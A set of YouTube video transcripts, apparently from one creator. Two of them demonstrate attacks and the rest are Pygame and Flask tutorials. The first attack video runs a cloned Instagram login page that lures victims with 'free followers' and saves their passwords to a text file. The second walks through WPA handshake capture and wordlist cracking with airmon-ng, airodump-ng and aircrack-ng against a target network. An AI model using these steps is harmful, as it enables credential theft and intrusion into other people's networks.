So once again, it was just a demonstration video. If you want me to create a video on how to do this, just put on the comment. I will just do that. The code for the site will be provided in the description. Make sure you check that out, but I won't be responsible for what you do with that. And also please like and subscribe to my channel. Our new video will be coming up real soon. If you have any suggestions for me to do, just put it on the comment box. I will be definitely doing that. So until then, ciao.
What's up guys, and welcome back to another YouTube video. In today's video, I'm gonna show you how do hackers take down an Instagram account using social engineering attack alias phishing attack. So before we get started, a quick disclaimer that today I am going to show you how a real phishing attack works and how hackers actually trick people to actually enter their credentials to fake websites. So please use this knowledge to actually for knowing and learning something from this. Don't use it for any illegal or malpractices. So whatever you do with this, I won't be responsible. So with that being said, let's roll the intro. So if you have already watched my other video where I actually pranked my friends saying free Instagram followers and managed to get their passwords, you may already know that what I have done there. It's not actually mandatory to watch that video before this, but I'll be showing that again what I have done there. But if you want to watch that, I will be putting it somewhere. Just go ahead and watch that. So if you have already watched that, you must know what I have done there, and I'm going to show that what I have done there. So you can see this is the code for the site I have created. So I have uploaded it on GitHub. I will be providing it in the description. Make sure you check that out. So now let's download a zip file. So it's downloaded. So now let me just go ahead and extract that. Downloads. Extract. Okay, let's extract here in this folder. Okay. So there we are in. And you can see a folder like this. If you go inside, you will see a main Python file. So for this work, you need Python 3 install your system as well as pip, which is the package manager for Python.
If you don't have Python installed on your system, go inside python.org/downloads and grab the latest version of Python from here. So now if you are ready with Python and pip, you are ready to go. So now you have to install Flask module for this work. If you don't know Flask, Flask is actually a micro framework for creating web application on Python. So let me just open up command prompt and actually go inside the downloads folder. Downloads cd to what's the directory name? Let me just do. Oh, I don't worry so much of files. I actually downloads again and again. Don't worry. Okay, now let me just go ahead and grab file name from here. Okay, it's Instagram hack prank. So cd inside Instagram hack prank, cd inside Instagram hack main. So we are here. So now if I ask for dir, you can see main.py file over here. So before we get started with main.py and running and seeing our website, first we have to actually install the dependencies. So you can see a file over here, requirement.txt. You have to first of all install. For that, type in pip install -r stands for reading requirement.txt. Oops, it's actually requirement.txt. Type enter. It will actually install the necessary dependencies for this web application to work. So you can see I have all modules already installed on my system. Now type in Python 3 or just Python. Doesn't matter much because I already have Python 3 installed on my system. So Python 3 main.py and type enter. And you can see log like this. Now if you go inside your browser and type in 127.0.0.1 on the port 5000, you will see a page like this which says Instagram and which is an 100% clone of Instagram page. And if I type in user and pass for password and login, it will actually redirect me to another page saying you have earned 4,941 followers. Congratulations, and it will be delivered in 2 to 3 days and keep going strong. So it's 100% fake. You will not get any Instagram followers. Actually, the hacker got your username and password. So it will say continue with Instagram, and if I press that, it will actually redirect me back to the original Instagram page, which is instagram.com. So now let me just show you where our passwords are saved. It's inside user.txt file in the same directory. If I double click that, you can see the username and password that I entered over there. That's it. We have literally got their username and password. It's that simple. So friends, as you can see, we got the password and credentials of our victim. Nowadays, many of the people are actually obsessed to get free Instagram followers and likes. Actually, there is nothing like that. So they will actually give their credentials and password to any invalid sites like this to promising that they will get free Instagram followers. Likewise, a hacker will actually trick the victim by saying free Instagram followers and please enter your credentials and you will get free Instagram followers. So once again, this is an educational purpose only video. Make sure that you learn something from this. Also, if you like this video, please give a thumbs up, subscribe to the channel. It will mean a lot to me. So our new video like this will be coming up real soon. So until then, ciao. Today I'm going to show you how to hack into a Wi-Fi network and gain its password. So this is going to be the re-upload of the video that I have already done, Wi-Fi hacking video. I am re-uploading this because my video got taken down by the YouTube community guidelines and I would love to get striked again. Nah, I'm just kidding. I'm really sad and someone actually told me to re-upload this video for some future references, I think. So that's why I'm re-uploading this video. So be it. Before we get started, as always, a quick disclaimer that please make sure that you learn something from this and know how an attacker actually attacks a Wi-Fi network and gains password or brute force a password. Don't test it on others' network and get into some kind of trouble. Test it on your own network and understand how this works and how you can secure your own password. And sorry if you're having any audio issue. So with that being said, let's get started.
The video will be split up to 4 steps. Step number 1 will be putting your Wi-Fi card to monitor mode.
The step number 2 will be actually capturing the available Wi-Fi networks around you. The third step is to actually capture the WPA handshake from our victim, and the fourth step will be actually cracking the WPA handshake and getting the passwords ultimately. Let us get to our first step, which is actually installing our tools, but I haven't included that in our steps because it's actually already installed on Kali Linux. It should if you're using that, but for me I'm using Linux Mint, so I have to actually install that. Crack G password, and it's already installed. I didn't know that. So now let us start with step number 1, which is actually put your Wi-Fi card to monitor mode. For that, first type in ifconfig, and it should return something like this, and you should get the name of the wireless Wi-Fi card of the device. For me it's WALP1S0. Now let me just clear that and type in airman ng start WLP1S0. Oops, I just forgot to give it root privileges. So, and you can see something like this. You can see the information about your driver, the chipset that you're using, etc, etc. And now you can see the Wi-Fi is disconnected for a device. That means you have put your Wi-Fi card to monitor mode. So now if this works, now we have actually successfully managed to put our wireless card to monitor mode. Now we have to actually check if this thing captures anything. So for that, type in sudo arrow dumping, and you can see your wireless card's name has been changed to WLP1S0 mod. That means you have to type in WLP1S0 mod, which stands for monitor mode. Type enter, and it should show something like this. And you can see something is actually popping up on my screen. You should also probably get something like this. So now we have successfully completed 2 steps, which was first step number 1, which is actually put your Wi-Fi card to monitor mode, and the second step was to actually capture the wireless networks around you. So now we are moving on to the step number 3, which is actually capture a WPA handshake from our victim. Our victim over here is this one, which is, let me just go ahead and copy that. Now we are at step number 3 to actually capture the WPA handshake of our victim. So for that, we are going to open up a new terminal and type in sudo arrow dumping, and we have to pass the BSS ID which we have targeting on, so which will be this one that I have copied earlier. So paste that. Now we have to actually pass the channel number which we are listening on, which will be channel 9. And now we have to actually write the captured data to a file, which will be WPA, and type in the monitor name of the card, P1S0 mod, that enter, and it will show like this. So basically what it does is that it will actually wait for a client to actually disconnect from the AP and actually reconnect from the access point. So resulting, we will be capturing a WPA handshake from the victim. So now let us go ahead and stop this and wait for the victim to actually disconnect and reconnect, and hopefully we'll get a capture handshake.
A few moments later.
There we are. We got the handshake, WPA handshake on the BSS ID, and it has been saved to the WPA file. So now after capturing the WPA handshake, if you look inside the directory, you can see something like this, WPA1.cap file and different kinds of file named that. So we are interested in WPA1.cap file. Now we are going to actually decrypt the password. For that, type in sudo aircrackng, and pass the file name, which will be WPA1.cap file. Then pass the word list which we are using to actually decrypt the password -w and the word list file. Press type enter and you can see we got the key which is 1 2 3 4 5 6 7 8. We have found the key of the access point this fast because we only have about 25 keys to be tested and it only have tested 7 keys to find the password. So if you're on Kali Linux, there will be a file named rocket.txt inside /word list. You can use that if you have a big password to crack on. So it will take some time to actually crack the password, but hopefully we got the password. So now we have to actually stop the monitor mode and revert it back to normal mode, right? So for that, type in sudo airman ng stop and the card name, which will be w1 p1 s0 mon, and type enter. And it will be reverted back to normal mode, and let me just go and test if the password was correct. So you can see Wi-Fi is showing up, victim's Wi-Fi. If I type in 1 2 3 4 5 6 7 8 and if I connect, you can see we have connected to the victim's Wi-Fi over here.
Plus, I thought that I could add some more content to this video on how to secure your password. So for securing your password, you must at least have an 8-character length password, a combination of uppercase, lowercase, numerals, alphabet, special characters, etc. A combination of this will get us protected from this kind of brute force attack from your Instagram account to Wi-Fi password. Make sure that at least you have an 8-character length password and has a combination of letters, numbers, and so on. So that's it for this video. Make sure that you like and subscribe to my channel. Our new will be coming up real soon. So if you have any questions or comments regarding this topic, just put it in the comments below. I'll be definitely checking that. So until then, as always, ciao.
What's up guys, and welcome back to the YouTube video. In today's video, we are going to start a new series, that is Python game development series, where we're gonna learn about the module named Pygame. So the Pygame module is used for creating a little scrappy 2D games on Python. So what my game basically does is that the game will have a player and a lot of enemies. So it's actually taking place in outer space. So the enemy tries to kill the player and the player will try to kill the enemy, and the player will have 3 lives. So that's basically it. So what are you waiting for? Let's get started. Now go ahead and fire up your favorite editor, mine's PyCharm, and let's install Pygame. So pip3 install Pygame. So I have already installed that. Now let's go to the documentation of Pygame and let's have something. Again, if you want to read this, just go ahead and do that. I'll be putting it in the description box, but stick with me, we will be doing it here. Now let's start with importing Pygame module. Import Pygame, and you get started initializing Pygame module, pygame.init. And now we have to specify the screen height and width. So let me just start with s is equal to pygame.display.set_mode, which will actually takes a tuple with height and width of screen. So it will be 600, 600. And I will put as caption for screen, which will pygame.display.set_caption. It will be as always monster hunter. Oops, monster hunter. And now let me run and check what will happen. So, oops, what happened? Pygame has no attribute. Oh, sorry. Let me run again. Now you can see a glance of Pygame window has been started and is closed because we had started a while true loop for this to be continuously shown. So we had a while true loop,
while true, and I will actually talk about it in a second. For event in pygame.event.get, I'll just print the events. So what it basically does is that while true actually opens our window forever, and this for event in pygame.get will actually returns every event that is happening on the screen. Let me show you real quick. If I run that, you can see monster hunter is there, and our window is here. And let me show you. You can see the window is actually capturing whatever happens to the screen. We move the mouse, press some keys, or press some space, R keys, mouse clicks, and everything is actually captured in the background of the pygame window. And now let us close this window, and it is not actually closing. That is because we had to program it to do that way. So now let us go ahead and if event.type is equal to pygame.quit or quit, just return r is equal to false, r is equal to false, r is equal to false, and this is just to r, and here we have specify r is equal to true. And also had to import the sys module. Exit. So what actually happens here is that you can see r is always true, and it will run the while true, and when the quit button is pressed, it will become false. It will actually terminate this loop. So let me just run and check that. You can see our monster is here, and if I press the close button, it will actually close. So that's pretty much for creating pygame window and all. Now let's go ahead and grab our enemy and player from here, phretree.com. You can have your favorite player and an enemy and import it to this directory over here. So after you have your enemy and the player, this is my enemy over here, and this is my player. So that's pretty much in this video. Make sure you subscribe and like to the channel. Part 2 of this video will be coming up pretty soon, where we're gonna actually import the page file to the game and actually give some player movements, etc. So until then,
I got the cash in the bag, stadium packed. Born a rock star in this life, gonna live it up on the attack.
What's up guys, and welcome to the part 2 of Python pygame development series. So in the last video we have seen how to create a simple pygame window, and also we have seen how to print the events happening on a screen, and also we have downloaded our player and enemy AMG files to our directory over here. And today in this video we are going to actually import the enemy and player to our game over here. So without further ado, let's get started. So before we get started with image insertion and all, let me just go ahead and show you the s.fill function, which is used for filling a color to the pygame window. So just say s.fill 255,255,255. So the first value stands for red color, and the green color, and the blue color, RGB values. So it will actually render a white color because all the three values are same and with equal intensity, so it will actually fill a white color. Here nothing is also because we haven't specified for the pygame to update the display. So if I say pygame.display.update, so what actually happens here is that it will actually update the display, so which will makes us to see the white color. So you can see our background has been changed to white color. Likewise, you can actually change to different colors. So let me just change it to blue color right now. You can see 255 value is for blue color, and you can see it's now in blue color. So let me just change it, and let me just give a red color to the screen. Here we are, we have got a red value to the screen. So likewise, if I just put the value to be 0, 0, 0, it will actually render a black window.
So let me just leave it black color for now. We will be having a background image later on. So now let's get started by importing the image files to our game. So player _img is equal to pygame.image image.load. It will basically load our image file, player png file, and also we also have to import the enemy _img pygame.image.load enemy.png. Now note that the enemy.png has a resolution of 2000 into 2000, which is actually really big considering our window size, right? So actually we have resized that. Now let me just show you by just placing that in my screen. So for placing, just type in s.split, the file name, actually the variable in which you loaded the file, and the next parameter will be the position to which you have to place your file. Let me just go with 0,0 from now and we'll run that. You can see our layer is here and which is really big in size. I can just show you the size of the file over here. You can see it's 720 into 713. If you want it in correct size and all, you can have it directly downloaded in resized form. But if you have a problem like me, you can just go ahead and use the scale function which is already inside Pygame. So let me just go ahead and resize its size. So player img is equal to Pygame dot transform dot scale, and you'll actually take the variable name first and the scale in which you want to resize to. So in my case, I'll just go with 150, 150, which is a decent size. So let me just run that, and here we are, and we have got a pretty decent size of the image. So like this, I'm also going to import the enemy.png. I also resize that is equal to enemy. Oops, not enemy, it's actually pygame dot transform dot scale so let it be a 200, 200. And now let me just go ahead and enemy mg. Now let me just go ahead and split our enemy to screen. Let it be 20,20. Now if we run that, you can see our alien is over here and we have our player over here. Now let me just go ahead and increase the distance between them, and we run that again. Now you can see our player is over here and our enemy is over here. So that's it for this video. Make sure if you like and subscribe to the channel. The part 3 of this video will be coming up real soon, where we will have player movements. So until then, ciao.
What's up guys, and welcome back to the YouTube video. In today's video we are going to start a brand new Flask tutorial series. So this is going to be the first video of Flask tutorial series. So in this video we are going to learn how to get started with Flask web development and how to create amazing web apps on the module Flask Python. So this video is gonna be a introduction and how to install Flask and how to get started with Flask, and also we will be covering some of the important topics on Flask, why it is used, why it is preferable to use, and where it is preferable to use, such kind of things. And we'll be also getting started to use Flask, such as installation, and we'll be also at the end of the video we'll be also running a little script just to demonstrate the running of Flask, etc. So So in this tutorial we will not be covering HTML and CSS things like that, because it's a lot of time consuming. We have to complete the whole Flask tutorial within like 10 videos. So we are not going to do HTML, CSS and deep into kind of things, but of course you should actually know about HTML as well as the basics of Python programming to go with this tutorial. Otherwise I would highly recommend to learn Python basics as well as basic HTML frameworks, etc. So guys, speaking of Flask is a kind of micro framework for web development. Apart from Django, Flask is easy to get started with, easy to deploy, and also easy to use module. If you're having a little project, like small little projects, I would highly recommend you to go with Flask upon Django, because Django is really kind of hard to get started and really easy to for a long run. So for if you're having a huge web application with so much of routes, so much of things to do, I highly prefer you to go with Django. But here you are getting started and you're a beginner and you know where to get started, and you want the nice little idea and logic behind web applications, I would highly recommend you to start with Flask, because Flask is the best module to get started with web development. So let me just go ahead and pull up the documentation over here. So this is a documentation I would highly recommend you to just pull up in your desktop. This one it will be really helpful on some of the more topics that I'm not going to cover. I'm not going to obviously cover each and every topic that is given here, so you can just just pull up and learn from this documentation after learning the basics from here. So what's the play? So today we are going to create a little chat application and learn the basics of Flask. So we are going to learn how to create a chat app on Flask from the basics till the end, and we are going to have a login screen, home screen, as well as the main chat page, and also we will have a logout of the user. So we are not going to get into database and database management and all. We are just going to save the user credentials and all just in a text file, just for studying sake. So before you get started into tutorial section and all, I just want to showcase some of the important projects that I have done on Flask. I'm not going to show you each and every projects that I have done on Flask, but just on important ones. I swear I do not take so much of time, like give me just 2 minutes. It's just to understand how powerful Flask is and how much awesome projects that we can actually create from Flask. So these are the 4 projects that I'm going to show you and introduce you about. So this is the first and foremost project that I have done. This is just a chat page. I actually learned the basics and the fundamentals of Flask as well as HTML and CSS from this very project. So if I can log in with some, this is the name of the user, I can just log in. This is the chat app, and we can actually upload file as well as see the uploaded files. You can just enter into the chat page over here. So you can see I'm in the chat page. Actually the users are not online, actually the users haven't logged out. So we can actually enter the message like hi or hello and type enter, and it will get updated over here, as you can see. And we can actually go back, and you can send a file as well as see the uploaded files by the different users. So that's pretty much it, not really big deal. And you can actually close this tab over here. So the next project I want to show you guys is Scratch. This is the second project that I used to learn Flask. So you can have sign up, login, as well as email verification is also there. So if you can actually log in, bring my password, then I can create a new node. First of all, you can create new node, save. You can actually customize this web page for your own need. You can actually get your own favorite font. You can just change the color. You can change your color of the text, background color, and font size, etc. And you can actually download this node into PDF and save it in your offline mode, and you can view all nodes. So this project actually helped me to learn how a user is managed. you have to create a user database, store their credentials, their data, and how we can actually you can circulate it among the user. So that is really the thing that I actually learned from this project. So we can close it. So this is the one of the best projects that I have deployed. So this is kind of a website where you can actually convert YouTube videos to YouTube link to video as well as audio. You can actually trim and download. These are really helpful, at least to me. I haven't seen very much of people using this site, but if you want, I will be putting the link in the description. You can really use this. So let me just go and grab a YouTube link over here. You just grab the YouTube link and we can paste it over here. Press enter. As you can see, we will get redirected to another page where you can just select the resolution of the video that you're downloading, and it will actually do a necessary calculation before showing this data, and all the available formats are shown over here. You can actually download from this, and you can actually download all the audio formats available, and you can actually trim, which is exact tool that I'm looking for all throughout all these times, and I haven't found none. So this is really helpful for me, at least, to create these YouTube videos. So that's what we did. So let's just move on to next project. So this is a chat application, the very most chat application that I have done, and it's just a student's portal, and it's under development. It's haven't finished, so you need to log in using our credentials. And you can see we will get redirected to a home page. You can see it actually has a really improved and improvised nice UI, and you can just send messages and receive messages in real time. It's updated using jQuery, which I'm really going to teach you in the further videos. So you can actually send and receive at the same time. And I'm going to also add images as well as video sharing feature into this app. It will be really awesome. So that's kind of overview of all the projects that I've done and what you're going to learn in this tutorial. So we are going to create a chat application like this one, of course, but without the CSS and the styling and all. I'll be providing another tutorial series on HTML and CSS. So guys, first things first, we have to create a folder for our code to live, right? So you have to create a place for our code to live. So folder, and just make it name as chat app, and just place it over here and open our text editor supply. Okay, let me just go and open folder in the desktop and chat app, search folder. Perfect. Now we have to install Flask in order to work with Flask, right? So open up your CMD. So hoping that you have installed pip and Python on your system, just type in pip install Flask and type enter. It will install Flask onto your system. Perfect. Now you can actually close this one over here and create a new file. So I'll prefer it as app.py. Okay, I'll just save it as app.py inside chat app. So app.py save. Perfect. So now let's get started by importing Flask from Flask import Flask. So it actually, the second one is actually capital Flask. So you can actually do like asterisk, but I will go with Flask because we can actually import all the components as we move on. So next thing we have to do is create an app for this Flask. So say app is equal to Flask underscore name underscore, and it will also if underscore main underscore name underscore is equal to underscore main underscore, then do app.1. So that's it. We have created successfully a web app. ourselves. So the next thing we have to do is to create different routes for our application to work. So such as if you visit this web page over here, if you visit this web page over here, you can see it's shown as Flask Pilot Projects /n/ there's so much of slash, right? So it's actually the routes in which the user are navigating to. So if you come into this /telegram.xyz, you will see the home page, obviously, right? Like if you come into this web page and remove this and type enter, you will see the home page of the website. So likewise, you have to show some home page of your website, right? So for that, you have to create different routes to the app. So say app.route, and you'll say / which will be the whole root of the website, and say define home. We will just return hi. I say not hi. I just say it works. They give some explanations, and we can just save that. And let me just go and run this one. cmd. I shouldn't have closed that one. cd desktop, and it says cd chat app. Just say python made of. Oh, it's app.py. Yeah. You can see the server is running right now in this URL, and if you open your browser and go to that URL, press enter. Okay, for this minute, just me give some enter. Okay, just a lazy server. So you can see it works. Perfect. Now we have created our own website using Python. So guys, if you come into the script, you can see return it works. So what we are actually returning over is actually HTML code to render the web page. So if you pass in like h1 and close the h1 tag, little basic HTMLs, so probably you have learned in school. So save this one and reload this page over here. It will actually change to, wait a minute, before all of that, I just want to show you. Currently the server is running. I have to close. I have made a change of the script, right? So I have to close the server and restart again to see the necessary changes that I have done. You can see it works. Why is that? It's so annoying, right? You have to close the script server and run again if you have made any changes to script. So in order to update, restart the server whenever you update or make changes to the script, you just pass on debug is equal to true. You should actually automatically detect the changes that you have done to the script and actually update on the server. Restart the server, and you can actually do not want to actually close and start again the server. So you can actually run app.py, and you can see debug mode is currently turned on, and if it detects any changes to the script, like if I just change this h tag or here and here too, and if I save that, it will actually automatically detect that and actually restart the server. If I reload this page, I can see it works. And if I wait a second, I haven't saved that, I guess. So save that. You can come inside this web browser, reload this page, and you can see it works. Perfect. So that's pretty much kind of for in this video. We can actually take the rest of the tutorial session in the next video. The next video we will be learning how to create, how to get data from HTML files, as well as how to create HTML files and show it to the user. So those are the two things we are going to do in the next video. So hope you guys have enjoyed this tutorial series. Please leave a like and give a subscribe. It will mean a lot to me. So if you have any questions or comments regarding this topic, just put in the comments below. I'll definitely checking that. So hope you guys have understand all the things that I currently have done. So wait until I release the next video. It will probably take 2 days. I'll be releasing 2 days per video, and it will take like 10 days to complete all the tutorial series. At the end of tutorial series, just create a brand new topic project and whatever you need. And awesome. So bye. What's up guys, and welcome to the part 2 of Python Flask web development series. So now you're second step ahead of creating your awesome web chat app. So in today's video we are going to learn how to create custom HTML files and serve that to our user. And the second thing we are going to learn today is that how to create static folder and how to place our static files inside the folder. So a static folder is which is used to actually store the static images / videos or the static files which we are going to serve to the user. And third thing we are going to learn today is that how to redirect or navigate our user from one page to another or different routes, how to redirect the user. And also I haven't made a really good clarification of what we are actually trying to do here. So we are going to create a chat application in which the user can actually log in using a random username. There will not be a credentials and storing and database and all. Just give a name. Just we can log into our chat application, and we can actually navigate your chat application, send text, images, videos, etc. And it's like a public chat room. Anyone can actually log in with a random name and you can chat with each other. So that's basically the idea. So without further ado, let's get right into it. So guys, this is where actually we kind of left off. So today we are going to get started by rendering custom HTML templates to our chat application. So the first thing I'm going to do is that create a home page in which we're going to show our title as well as saying why you want to use our web application, as well as a home button with images and all. So first of all, we have to design the HTML file and place it inside a folder named templates. Why we are going to create a folder named templates? Because when you actually pass the HTML file to Flask will actually search for a folder named templates, and it will search the HTML file inside the templates folder. It will be clear in a second. First of all, you need to create a new file and save that file. Before saving, I must create a folder inside chat app, right? So let me just go inside our folder chat app. Inside in here, let me just create a new folder which will be named as templates. Type enter, and inside of that we are going to place the HTML file. So I'm just gonna save this one to templates, and it will say home.html because we are going to create a home page. Home.html, and we'll start writing our HTML. This is all basic HTML. Probably you should have learned in the school. So /head, and we'll also create a body tag, body /body. Perfect. Now we have to first of all put our title of our web application, chat application. Say title, and also let me just be chat app, just chat app. So inside the body, I will say inside like h1 tag, I'll say share and let's say inside p tag, I'll say this is the world's best share app, and I will create a button. So say button /button, and I will say enter chat, and that's pretty much it. And if I save this, so this is going to create a HTML page which will be titled as chat app and also with the heading chat app, and actually display a message. This is the world's best chat app, and it will like show a button, enter chat. That's it. No bridge message styling at all, just displaying the HTML file. So how to return this HTML page to this web app, right, while serving? So if I go inside the chat app and open up templates, you can see a home.html file. If I double click over here, it will actually open up the web browser and display the HTML file over there. Summoning up. Okay, it's loading now. Perfect. You can see chat app, and this is the world's best chat app. Enter chat. If I press this button, nothing will do because we haven't programmed it in the way work like that. So we just close here. Okay. Now, how to return that HTML file to our Flask web app? In order to work with that, you must import something called render template. So this is actually an HTML page renderer for the Flask web app. So it will actually render the HTML file to your web app. And return render template and pass your file name, which will be home.html. So save that. So whenever the user is going to come into your root folder, root route, then the user will actually see the home.html file over there. So make sure that your HTML file is inside the templates folder. So that's the only thing that you have to consider while doing that. So I'll just go open up cmd command prompt. Here we are, cd desktop and cd chat app python.py, type enter. Perfect. Now inside in here, just go to the localhost. Now you can see inside the root folder, we have successfully displayed our HTML page, chat app. This is the world's best chat app, enter chat. Perfect. So guys, I was just going through my chat application and I actually kind of feel bad because there's nothing like eye-catchy content in this web app, right? So user will not use this web app. So I'm thinking of something else. Let me just play some image over this chat application, right? So I'm not doing this for the sake of the user, because I just want to teach you something else. So I just want to grab an image of chat app. I don't think it will work. I just need an image of a person who is chatting. Okay, let's go with this one. Not a problem. It's kind of small. Let it be. Save image. Save image to desktop. Inside chat app, and it will save inside templates. Save. Perfect. Now it's inside the templates folder. Perfect. Now we have to place the image over here. So in order to place image, just type in img source is equal to download. What was this extension? Is JPEG. So JPG download.jpg, and save this one and come inside in web app and reload this page. Okay, you can see it's not working. If you come inside templates folder, you can see the download.jpg over here, and the download.jpg is not showing inside of your page. So that's what I actually exactly want to show you guys. It's not working because it is not statically stored inside your web browser. Web app. So if you want to show the download JPEG into your web application, you must store inside a folder named static. So next step we have to do is that we are going to create a folder named static. So we static and place the download.jpg to chat app inside static folder. Perfect. Now if we come back into our text editor, inside static folder you can see download.jpg is currently in static folder, and if I change this URL to static/download.jpg and save this one over here and come over here, back over here and reload this page, you can see the image is right over there. So these are the one mistake that I actually want to learn while I was learning Flask, and actually it took a lot of time for me to figure out why to use static and how to place static files inside the folder. So that's it, and now you have fully placed in. Just go on and put a BR to get a new line, to place the button to a new line. So reload and the button is on new line. You can see in the chat, this is a home page of the chat app. Kind of bad, but it does the job. So guys, now let us get started by creating multiple routes to our web app. So currently you can see this only app route over here, just home.html. Now you have to create multiple number of routes to your chat app. Example, login for the user and the chat homepage, etc. So inside in here, I'm going to create let.be over here at app.route. Now say /login. Now say define login. Now say inside in here return this is the login page. And if I go save that. So now if we come inside the home.html page, inside button, I say on click is equal to window.location is equal to /login. If I save that, okay. And so if I reload this page and press the enter chat button, you can see this is a login page. I actually got redirected to the login page. Now I'm going to show another function of redirect. So inside in here, you can actually do it inside this Flask app itself, like redirect. So I'm going to redirect, import redirect from Flask, and actually redirect this home page directly to the login page. So say redirect. So what to actually redirect? We are going to redirect URL_4, which we have in the redirect imported. So it will be URL4, which URL we are going to redirect to. So it will be login, right? So we are going to create a URL endpoint for login. So saving that, and if I come down in here, back, and if I reload this page, you can see it will actually automatically get redirected to the login page. Instead of showing the render template, it will actually get redirected to the login page. So actually I'm going to redirect and route users using HTML page itself. I'm not going to really use this function, but if there is a case to use that function, I will be definitely using that. So just in case, just to mention, and also render template, this is a login page. Perfect. So today we have learned how to render a template, how to redirect between users, how to place use static folder to place images and things like that. Whatever images, video files, CSS, JS file, whatever files you use on a Flask app must be put inside the static folder, otherwise it may not work. So guys, one more thing that I want to tell you guys is that inside this localhost, whatever you put inside the static folder will be visible to the user. So technically you mustn't place your credentials or your private files or databases, etc. inside the static folder. It should be inside the root folder where the Python script lives. It can be accessible like place typing static slash download.jpg. You can see we got the image files that we have placed inside the static folder. So likewise, if you place your database / your user credentials inside the static folder, it will be a huge security breach. So hopefully please don't do that. So make sure that, and hope you guys have enjoyed this video. Please leave a like, subscribe to the channel, and also please make sure that you comment down below if you want to add any features to this web as we develop and on. So if you have any questions or comments regarding this topic, just put it in the comments below. I will be definitely checking that. And that's all this for this video, and bye. What's up guys, and welcome back to another YouTube video. So this is going to be the third part of Flask Python development series. So in this video we are going to learn how to log in a user, how to retrieve form data from the HTML page, and also we are going to learn how to use sessions to store login credentials or username / user credentials and user data as sessions on the Flask web app. So basically we will be learning how to retrieve the form data, the text input field, and how to retrieve it back to the backend of the server and process it according to our need, and actually store the user credentials such as username and password as sessions in the web backend. So without further ado, let's get started. So guys, this is where we actually kind of left off last time. So currently we have learned how to place templates inside this templates folder and return it according to our need, and also we have learned how to place static files such as images and serve it to our user. So in today's video we are going to learn how to retrieve data from HTML pages and log in our user to our Flask web app such as a chat app in this case. So let me just go and show you currently where we are. So let me just go and open up our CMD, cd desktop, cd chat app python app.py, and you can see the server is now running. And if we come back to our web browser and type in the localhost and over the port 5000 type enter, you can see our chat app's homepage is shown in this case. So if I press enter chat, you can see we have redirected to the login page, and this is the login page. So instead of showing this message, this is a login page, we have to show the user form in which users can actually enter their name and log into our chat app. So we are not going to use any password, database, that kind of things, just to understand how sessions works, how to retrieve form data to the backend of the server, etc. So now, without showing this message, now we have to run an HTML file and serve that to our user. So we have already learned how to do that. You can see we have rendered a home.html file into our root of the web page. So likewise, we have to now render our login.html page to the login route. So first of all, we have to create a new file, login.html, and save that inside our templates folder. You can see chat app templates, and you have to save that as login.html. So you can see login.html is over here. Let me just go and copy this and paste it over here. Instead of chat app, let me just say login, and instead of this chat app tag, let me just say it as login. So we don't want any messages to show for now. We will be showing in the messages. In next tutorial, we're going to learn Jinja template, which is used to retrieve server data and display it on the HTML page. So today we are going to learn how to retrieve data from HTML page and to the backend of the server. So next video we are going to learn how to send server data to the HTML and display it over there. So now we can get rid of this image, and this is not needed. And instead of, now we have to start putting up a form. So if you come inside this terminal, you can see get data. So get and post are the two methods which is used to retrieve as well as give the data to the server. So we are going to use a method called post to post the data to the server, and the server will handle the rest of that. So if I can say method is equal to post. So whatever data you want to retrieve to the backend of the server must be put inside this form. So let me just close the form, So now let me just go ahead and create our input field in which we have to enter the name of the person. So let me just be input, and I'll say type is equal to text, and I'll say name is equal to name. Another thing we have to do is submit the form to the backend whenever it is time. So when I press the submit button, we have to submit that data back to server, right? So in order to do that, you have to type input, type is equal to submit, and value is equal to in the chat. Let it be login. So save that. You can see now we have created a form with the method post, and we have created an input field in which the user can actually input their name, and we have created another input tag which has the task type, submit type, which will actually eventually submit this form over here. So if the user presses this button over here, the form will actually get submitted to the app.by over here, the backend of the server, backend of the web page. So now we have to return the home.html, login.html when the user visits login, right? So let me just say, as we have learned in the second video, run the template, and we will say login.html. Perfect. Let me just gonna save that, and if I come to the terminal over here, it's restarting. And now if I come inside in here, reload this page, it will actually show the web page over here. You can see login. Okay, login is over here. Why the enter chat? Oh, I haven't cleared the enter chat. We don't need this button over here. It's not needed. So let me just save that again, reload this page again, and it will actually remove the enter chat and show the login. You can see you can press enter your name, but it will not work because we haven't programmed the backend to work that way, right? Method not allowed. That is because currently the login route over here is not accepting post methods from the web browser. So in order to make it accept post methods, we have to do is methods is equal to get and post. So this will allow this route over here to accept post method, post request from the web browser. So if I gonna save that, it's restarting, detect change and restarting. Now if I come down in here and go back, and if I submit again, login again to the server, it will actually return that no response was provided from the server, because even if the data is retrieved to the login route, the login route don't know what to do with the data. So we have to do is that if method dot request dot method. So in order to do that, we have to import another thing called request. If request request dot method is equal to post, then it will say name is equal to request dot form of, and I will say name. Let me just print out this name. So I'll explain what is happening over here in a second. So if I come back in here, go back and the chat, and if I can load up, why is it not loading fast enough? Oops, something is wrong. Oh, sorry, I didn't. Okay, it's my mistake. Sorry. If I reload this page, start the web server again, and reload this page to login. You can see login page is over here. I can actually enter some name and login, and you can see it have done something because it didn't. You can see AJ is printed over here. So now what we have done here, so we have actually checked if the request is a post method, then without any errors we have retrieved the form data with the name. So you can see inside in login form, you can see we have placed an input text field as name, so which you recognize inside here form of name, which will return the value inside the form while submitting the form. So that's it. We have successfully retrieved data from HTML page. If you have any doubts, put it on the comments below. Hope you guys have understanding what I am trying to say here. So that's it. We have successfully retrieved data from the HTML page. You can have multiple number of fields such as user input, password, whatever you can need. But in this chat app, it's a public chat app, we are only using the name of the person to chat. So that's it for now. We have successfully retrieved value from the text field, and we have print the name of the person. So guys, the next thing we have to do is actually log in our user to our web app, right? So how are we gonna do that? We are going to use a functionality called sessions. Sessions are used to store the username inside the Flask web app as encrypted. So it will be encrypted, the username will be encrypted and stored inside the Flask web app or the web browser, and it will actually check if the user is logged in or not. So if I come down in here, we have to create an app.secret key which for the web app. So session is actually encrypted, so for that we have to create a key which will actually encrypt and decrypt the user credentials / data whenever we use a session. So app.secret underscore key is equal to this score is my key. So as you can see, this is my key is not a really good passphrase. So when you deploy the web app, you must change it to something really good passphrase with a number of uppercase, lowercase, like a password, really big passphrase. It will help. So currently we'll go with this is my key, and the secret key for our web app will be this is my key. So now we have to store the session whenever the user is logging in, right? So whenever the user is logging in, we will do is that we will say session. I'm sorry, this is session of user is equal to string of name. So what is it? It is actually doing is that this is a dictionary, so it will be stored as user is equal to you are knowing that, of course, if you know the basics of Python. So this is called a dictionary, so it will be it's a type of data type. It will actually store the user pointing to the value name over here. So it will store as session of user is equal to name. So after this, we will do is a redirect to another route of the main chat page. So I will say create another app.route app.route, and let's say /main, and it will say define chat page, and it will say return main chat page. Okay, now inside in here we will say, after 